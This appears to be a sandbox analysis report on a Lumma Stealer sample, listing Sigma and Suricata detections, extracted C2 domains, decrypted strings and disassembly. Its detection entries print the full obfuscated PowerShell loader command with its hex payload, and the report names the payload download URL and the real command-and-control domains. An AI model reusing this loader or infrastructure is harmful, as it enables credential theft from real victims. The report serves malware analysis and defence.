edSX('A31F9B9673349AFE3B35F831884A152ADF6EC95559396B5F57D0E445E50347CF7164B0CDC68178F82B54654182EB897B5224571B2475EFD970B415458A7AF789FC1E6F7ABBFF5A67EBB9C103A46965E4B312951120DDD87FDAA3DC376F7EB96A063404F5B45999454184A2BBA29F2CB28EA21A2DA856B254CC0F3BFD7FBCDF179A40AF3A54D7A9C674CC8BB41E0C4FD97C7113C648A150674D11EC4AD48559848466FBB95FE08C8526FBFA39058B783166A23AE29F4DA0CF61DC080DFC185C0793C8E21A60AF85E83785E482739FE2AF207C5F01D57E37973B829781481ABDCE8569691AFD4276B4F5A07138F03A1BEA59CD80A67D128F1F59B5F08CD14560906ADC8FC07ECEACD2CA936BF14DD67C0C322A614DA8949AAE4F3F3DD8C4963919366C68E97BE23A086EA39D6E3567274098AE593624ACBD21A7AA02CDE0168602BEA805BA25CAB6368F6F34EA5F73DE61B4BD7C0CA3FF765FEE92A3FF56F66AC139EA96B5A4189ECC7256D4AEBE2026C1ACAFA195958FBE0CF912FEE6E99CA63092E010DF6B7742F3AC98BBD4B06F22EC971C9EC6E3ABCB27953F51DF704695B061AC6BEC33C1B700DBA4BB023B15DA076C042FAA3A95A07706C8AE7E88553450F62468B509FEA6D5CB4350A584FBB2D977F158D34857F26CCC849BE780CB8166B92B610B64C3334FCE35D8F1F478230DAE6C3E86CF93844296A874DEEC71EC4B6694A2AD0018F51C2572849BC046EAC16B467EAB7E6229F03DC638AA510B63A4EBACB32766940CCE7DAF1FCF4F63C76BE1C97A0A09F5362D2D1417AF18230B809ACD1D1F225F4EFC165C55A8BC086346DC9D3715EC116DE095878D1134ADD3C14DC8125EB0D61BEC915BCE4B6FB0EF0A1BDBBE7E3A1F66B88

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function edSX($vXCW){return -split ($vXCW -replace '..', '0x$& ')};$lUxv = edSX('A31F9B9673349AFE3B35F831884A152ADF6EC95559396B5F57D0E445E50347CF7164B0CDC68178F82B54654182EB897B5224571B2475EFD970B415458A7AF789FC1E6F7ABBFF5A67EBB9C103A46965E4B312951120DDD87FDAA3DC376F7EB96A063404F5B45999454184A2BBA29F2CB28EA21A2DA856B254CC0F3BFD7FBCDF179A40AF3A54D7A9C674CC8BB41E0C4FD97C7113C648A150674D11EC4AD48559848466FBB95FE08C8526FBFA39058B783166A23AE29F4DA0CF61DC080DFC185C0793C8E21A60AF85E83785E482739FE2AF207C5F01D57E37973B829781481ABDCE8569691AFD4276B4F5A07138F03A1BEA59CD80A67D128F1F59B5F08CD14560906ADC8FC07ECEACD2CA936BF14DD67C0C322A614DA8949AAE4F3F3DD8C4963919366C68E97BE23A086EA39D6E3567274098AE593624ACBD21A7AA02CDE0168602BEA805BA25CAB6368F6F34EA5F73DE61B4BD7C0CA3FF765FEE92A3FF56F66AC139EA96B5A4189ECC7256D4AEBE2026C1ACAFA195958FBE0CF912FEE6E99CA63092E010DF6B7742F3AC98BBD4B06F22EC971C9EC6E3ABCB27953F51DF704695B061AC6BEC33C1B700DBA4BB023B15DA076C042FAA3A95A07706C8AE7E88553450F62468B509FEA6D5CB4350A584FBB2D977F158D34857F26CCC849BE780CB8166B92B610B64C3334FCE35D8F1F478230DAE6C3E86CF93844296A874DEEC71EC4B6694A2AD0018F51C2572849BC046EAC16B467EAB7E6229F03DC638AA510B63A4EBACB32766940CCE7DAF1FCF4F63C76BE1C97A0A09F5362D2D1417AF18230B809ACD1D1F225F4EFC165C55A8BC086346DC9D3715EC116DE095878D1134ADD3C14DC8125EB0D61BEC915BCE4B6FB0EF0A1BDBBE7E3A1F66B8842FC06096AF4E459E3AB4313C4793DCA582EC173E0DAC64534C8B839898A145779CF154674C0AE6F37B54D6B4B13E79735CC2476D5784F96960B10D71A61AB4B67A58B61390249E457FF1005BEB7ACF7A43EE2768E04D4F6FEF537A461B936EE4C0D1808455EBC1927A1E4FC80E91C69F015D288EC31966605CA3FAC7BDFE119B9780C54C172AB01029519B661359B035D477BFE75C71BA1D61A3FD4C7C56A2E76386F7B937A5DDE32CCE6982DEE8E464B2F0D40D595F50EC1801407ADB67F18011AE692B6F0BAA0465ACC91F95CC572304B79D3582A2AEA5F4453DFA1D7E39F5531233C6359F55D33BE19A911559F608653DFD08BBAF79AF2B0917D6EEBE46595756FB41358F33598CCF1E7BE52592115909F9E75477B49B50BA1E60CFBAECFE4AAF4141B07F42C5D596954C405EB172D697BDC63DCEBF8001CA89829E354D2DA20DC9739369899AF53E537DA7B73870831EEFEF889845BBDCF9501654607CF133DCDB9D67420AFC78AA9092BD52A145B944360F0BFECDC7D4932028F16E87771AC1D866EBEC7289803D86ED9904AFDFBFBF5BB048929DB7DB2AC8F63C7EDB203F8E1A174EBE2157AE182E3DBDED3349D83D3D3BC6745E2D5DF17346843FF66DB2BDFC5716E26800477742AF6898AD106316D2237BE4FADEE711172BE9B793AFE378904EC0F53DEE91616E5612EDE3DFB0863A38BAEFACED7F01D988DDCA3304F15DB3A3C71E8CA78B9035B71F7D878AE021C1C142705EC1CBA01FF772D3D880B207B97552700D5D050FE7D8F10D439FF89CEC8E7F26390CBB53F8B2F2E00092A567DDCE5162D4A1597C086F61B398754D709679F2E64B246D6B19AA8BCC08D2AA9B4B391B538D4260FF70CCD920892870858B847D56EAE7A4C64CD4F4C47355F52A842C2647543A4410AB6F0BB68693D79D2DC1A5FAF21241F5C66270CDE2DDD2DEF48DA7DA406D1A0A40075E041A292A5BEAAD267D3D4ED90575F605397391B20AF0B0020D8533E080691845C6A97A37F6782F4C741D9A038423C502F9B4B92EE6E0B4478D1356F52573E4DE57496D7A6B773C3CC0A190750625F496DB4B22EEFDFFBC405BDA4

Sigma detected: Potential Encoded PowerShell Patterns In CommandLine

Source: Process started

Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function edSX($vXCW){return -split ($vXCW -replace '..', '0x$& ')};$lUxv = edSX('A31F9B9673349AFE3B35F831884A152ADF6EC95559396B5F57D0E445E50347CF7164B0CDC68178F82B54654182EB897B5224571B2475EFD970B415458A7AF789FC1E6F7ABBFF5A67EBB9C103A46965E4B312951120DDD87FDAA3DC376F7EB96A063404F5B45999454184A2BBA29F2CB28EA21A2DA856B254CC0F3BFD7FBCDF179A40AF3A54D7A9C674CC8BB41E0C4FD97C7113C648A150674D11EC4AD48559848466FBB95FE08C8526FBFA39058B783166A23AE29F4DA0CF61DC080DFC185C0793C8E21A60AF85E83785E482739FE2AF207C5F01D57E37973B829781481ABDCE8569691AFD4276B4F5A07138F03A1BEA59CD80A67D128F1F59B5F08CD14560906ADC8FC07ECEACD2CA936BF14DD67C0C322A614DA8949AAE4F3F3DD8C4963919366C68E97BE23A086EA39D6E3567274098AE593624ACBD21A7AA02CDE0168602BEA805BA25CAB6368F6F34EA5F73DE61B4BD7C0CA3FF765FEE92A3FF56F66AC139EA96B5A4189ECC7256D4AEBE2026C1ACAFA195958FBE0CF912FEE6E99CA63092E010DF6B7742F3AC98BBD4B06F22EC971C9EC6E3ABCB27953F51DF704695B061AC6BEC33C1B700DBA4BB023B15DA076C042FAA3A95A07706C8AE7E88553450F62468B509FEA6D5CB4350A584FBB2D977F158D34857F26CCC849BE780CB8166B92B610B64C3334FCE35D8F1F478230DAE6C3E86CF93844296A874DEEC71EC4B6694A2AD0018F51C2572849BC046EAC16B467EAB7E6229F03DC638AA510B63A4EBACB32766940CCE7DAF1FCF4F63C76BE1C97A0A09F5362D2D1417AF18230B809ACD1D1F225F4EFC165C55A8BC086346DC9D3715EC116DE095878D1134ADD3C14DC8125EB0D61BEC915BCE4B6FB0EF0A1BDBBE7E3A1F66B8842FC06096AF4E459E3AB4313C4793DCA582EC173E0DAC64534C8B839898A145779CF154674C0AE6F37B54D6B4B13E79735CC2476D5784F96960B10D71A61AB4B67A58B61390249E457FF1005BEB7ACF7A43EE2768E04D4F6FEF537A461B936EE4C0D1808455EBC1927A1E4FC80E91C69F015D288EC31966605CA3FAC7BDFE119B9780C54C172AB01029519B661359B035D477BFE75C71BA1D61A3FD4C7C56A2E76386F7B937A5DDE32CCE6982DEE8E464B2F0D40D595F50EC1801407ADB67F18011AE692B6F0BAA0465ACC91F95CC572304B79D3582A2AEA5F4453DFA1D7E39F5531233C6359F55D33BE19A911559F608653DFD08BBAF79AF2B0917D6EEBE46595756FB41358F33598CCF1E7BE52592115909F9E75477B49B50BA1E60CFBAECFE4AAF4141B07F42C5D596954C405EB172D697BDC63DCEBF8001CA89829E354D2DA20DC9739369899AF53E537DA7B73870831EEFEF889845BBDCF9501654607CF133DCDB9D67420AFC78AA9092BD52A145B944360F0BFECDC7D4932028F16E87771AC1D866EBEC7289803D86ED9904AFDFBFBF5BB048929DB7DB2AC8F63C7EDB203F8E1A174EBE2157AE182E3DBDED3349D83D3D3BC6745E2D5DF17346843FF66DB2BDFC5716E26800477742AF6898AD106316D2237BE4FADEE711172BE9B793AFE378904EC0F53DEE91616E5612EDE3DFB0863A38BAEFACED7F01D988DDCA3304F15DB3A3C71E8CA78B9035B71F7D878AE021C1C142705EC1CBA01FF772D3D880B207B97552700D5D050FE7D8F10D439FF89CEC8E7F26390CBB53F8B2F2E00092A567DDCE5162D4A1597C086F61B398754D709679F2E64B246D6B19AA8BCC08D2AA9B4B391B538D4260FF70CCD920892870858B847D56EAE7A4C64CD4F4C47355F52A842C2647543A4410AB6F0BB68693D79D2DC1A5FAF21241F5C66270CDE2DDD2DEF48DA7DA406D1A0A40075E041A292A5BEAAD267D3D4ED90575F605397391B20AF0B0020D8533E080691845C6A97A37F6782F4C741D9A038423C502F9B4B92EE6E0B4478D1356F52573E4DE57496D7A6B773C3CC0A190750625F496DB4B22EEFDFFBC405BDA4

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-30T19:16:27.797833+0100	2028371	3	Unknown Traffic	192.168.2.5	49982	188.114.96.3	443	TCP
2024-12-30T19:16:28.872471+0100	2028371	3	Unknown Traffic	192.168.2.5	49983	188.114.96.3	443	TCP
2024-12-30T19:16:30.625473+0100	2028371	3	Unknown Traffic	192.168.2.5	49984	188.114.96.3	443	TCP
2024-12-30T19:16:31.592886+0100	2028371	3	Unknown Traffic	192.168.2.5	49985	188.114.96.3	443	TCP
2024-12-30T19:16:32.693631+0100	2028371	3	Unknown Traffic	192.168.2.5	49986	188.114.96.3	443	TCP
2024-12-30T19:17:42.486710+0100	2028371	3	Unknown Traffic	192.168.2.5	49987	188.114.96.3	443	TCP
2024-12-30T19:17:50.846432+0100	2028371	3	Unknown Traffic	192.168.2.5	49988	188.114.96.3	443	TCP
2024-12-30T19:17:53.525128+0100	2028371	3	Unknown Traffic	192.168.2.5	49989	188.114.96.3	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-30T19:16:28.296917+0100	2054653	1	A Network Trojan was detected	192.168.2.5	49982	188.114.96.3	443	TCP
2024-12-30T19:16:29.323743+0100	2054653	1	A Network Trojan was detected	192.168.2.5	49983	188.114.96.3	443	TCP
2024-12-30T19:17:53.996594+0100	2054653	1	A Network Trojan was detected	192.168.2.5	49989	188.114.96.3	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-30T19:16:28.296917+0100	2049836	1	A Network Trojan was detected	192.168.2.5	49982	188.114.96.3	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-30T19:16:29.323743+0100	2049812	1	A Network Trojan was detected	192.168.2.5	49983	188.114.96.3	443	TCP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-30T19:16:31.116182+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.5	49984	188.114.96.3	443	TCP
2024-12-30T19:17:50.124243+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.5	49987	188.114.96.3	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://cdn1.klipbazyxui.shop	Avira URL Cloud: Label: malware
Source: https://cdn1.klipbazyxui.shop/web44.dle	Avira URL Cloud: Label: malware

Found malware configuration

Source: 8.2.powershell.exe.400000.0.unpack

Malware Configuration Extractor: LummaC {"C2 url": ["rebuildeso.buzz", "hummskitnj.buzz", "cashfuzysao.buzz", "appliacnesot.buzz", "prisonyfork.buzz", "inherineau.buzz", "noisercluch.click", "scentniej.buzz", "screwamusresz.buzz"], "Build id": "WG6I6S--web44"}

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 98.3% probability

Sample uses string decryption to hide its real strings

Source: 00000008.00000002.4456127853.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: hummskitnj.buzz
Source: 00000008.00000002.4456127853.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: cashfuzysao.buzz
Source: 00000008.00000002.4456127853.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: appliacnesot.buzz
Source: 00000008.00000002.4456127853.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: screwamusresz.buzz
Source: 00000008.00000002.4456127853.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: inherineau.buzz
Source: 00000008.00000002.4456127853.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: scentniej.buzz
Source: 00000008.00000002.4456127853.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: rebuildeso.buzz
Source: 00000008.00000002.4456127853.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: prisonyfork.buzz
Source: 00000008.00000002.4456127853.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: noisercluch.click
Source: 00000008.00000002.4456127853.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000008.00000002.4456127853.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000008.00000002.4456127853.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 00000008.00000002.4456127853.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000008.00000002.4456127853.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 00000008.00000002.4456127853.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: WG6I6S--web44

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Code function: 8_2_00415640 CryptUnprotectData,

8_2_00415640

Source: unknown	HTTPS traffic detected: 172.67.154.95:443 -> 192.168.2.5:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49982 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49983 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49984 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49985 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49986 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49987 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49988 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49989 version: TLS 1.2

Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: powershell.exe, 00000004.00000002.2946665366.0000000007510000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: powershell.exe, 00000004.00000002.2946665366.0000000007510000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: powershell.exe, 00000004.00000002.2946159742.0000000007410000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: protobuf-net.pdb source: powershell.exe, 00000004.00000002.2946159742.0000000007410000.00000004.08000000.00040000.00000000.sdmp

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+795224B5h]	8_2_00426230
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then mov word ptr [edx], cx	8_2_004192C0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax+418B67A0h]	8_2_0040D35C
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then mov ecx, eax	8_2_0043C59C
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+eax+273D8908h]	8_2_0043EEC0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then cmp dword ptr [edi+ebp*8], 40C3E6E8h	8_2_0043EEC0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then mov ecx, eax	8_2_0042BF45
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+eax+273D8908h]	8_2_0043F040
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then cmp dword ptr [edi+ebp*8], 38B2B0F7h	8_2_0043F040
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then mov byte ptr [esi], cl	8_2_0042B078
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 2213E57Fh	8_2_0043A800
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 06702B10h	8_2_0043A800
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 2213E57Fh	8_2_0043A800
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then mov ecx, eax	8_2_0043A800
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then movzx edx, byte ptr [ebx+eax]	8_2_0043B813
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], AD68FE34h	8_2_0043E8D0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then push esi	8_2_004210F3
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then mov edx, eax	8_2_00418095
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx-6E7BF537h]	8_2_0042C894
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then mov ecx, eax	8_2_004290B0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx-23ABFE5Bh]	8_2_004290B0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then jmp edx	8_2_0043D140
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then mov ecx, eax	8_2_0041D172
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx-6E7BF537h]	8_2_0042C9DA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx-6E7BF537h]	8_2_0042C9E9
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx-6E7BF537h]	8_2_0042C984
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then mov ecx, eax	8_2_0041D189
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+795224EFh]	8_2_004259B0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then mov word ptr [edx], cx	8_2_00414A50
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then mov eax, ecx	8_2_00414A50
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then mov ebp, dword ptr [esp+20h]	8_2_00414A50
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h	8_2_00414A50
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h	8_2_00414A50
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then mov esi, edx	8_2_0041720B
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+65F916CFh]	8_2_0041720B
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax-15B7625Fh]	8_2_00428290
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then movzx edi, byte ptr [esp+eax+273D8904h]	8_2_0043DAA0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then cmp dword ptr [ebp+edi*8+00h], 9164D103h	8_2_0043DBB0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]	8_2_00407440
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then movzx ecx, word ptr [ebp+edi*4+00h]	8_2_00407440
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then cmp word ptr [edi+eax], 0000h	8_2_0041CC60
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then movzx ecx, byte ptr [edi+eax]	8_2_0043B46A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then mov dword ptr [ebp-00000248h], E7E6E5E6h	8_2_0043BC14
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then mov ecx, eax	8_2_0043BC14
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then mov esi, eax	8_2_00416D52
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then mov edi, ecx	8_2_0041D560
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+ebp]	8_2_00437D00
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then mov word ptr [ebx], cx	8_2_0041AD81
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	8_2_00429DA0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then mov edx, ecx	8_2_0040EDB4
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then mov edx, eax	8_2_0040EDB4
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then mov edi, dword ptr [esp+54h]	8_2_00428640
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then mov edx, eax	8_2_0043BCDB
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then movzx esi, word ptr [ecx]	8_2_004146C0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then mov byte ptr [ecx], al	8_2_004266C0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then jmp edx	8_2_004226D3
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then jmp eax	8_2_00423FF1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then mov edi, dword ptr [esp+30h]	8_2_00423FF1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then cmp dword ptr [esi+ebx*8], 4B1BF3DAh	8_2_00437790
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then push dword ptr [esp+04h]	8_2_00437790

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49982 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49982 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49989 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:49984 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:49987 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49983 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49983 -> 188.114.96.3:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: rebuildeso.buzz
Source: Malware configuration extractor	URLs: hummskitnj.buzz
Source: Malware configuration extractor	URLs: cashfuzysao.buzz
Source: Malware configuration extractor	URLs: appliacnesot.buzz
Source: Malware configuration extractor	URLs: prisonyfork.buzz
Source: Malware configuration extractor	URLs: inherineau.buzz
Source: Malware configuration extractor	URLs: noisercluch.click
Source: Malware configuration extractor	URLs: scentniej.buzz
Source: Malware configuration extractor	URLs: screwamusresz.buzz

Source: global traffic

HTTP traffic detected: GET /web44.dle HTTP/1.1Host: cdn1.klipbazyxui.shopConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3

Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49983 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49986 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49989 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49984 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49982 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49987 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49985 -> 188.114.96.3:443
